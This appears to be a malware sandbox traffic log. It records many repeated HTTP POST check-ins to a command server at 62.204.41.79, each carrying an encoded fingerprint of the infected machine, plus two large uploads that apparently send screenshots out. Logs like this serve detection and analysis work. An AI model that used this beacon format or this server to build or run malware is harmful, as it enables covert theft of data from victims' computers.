Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
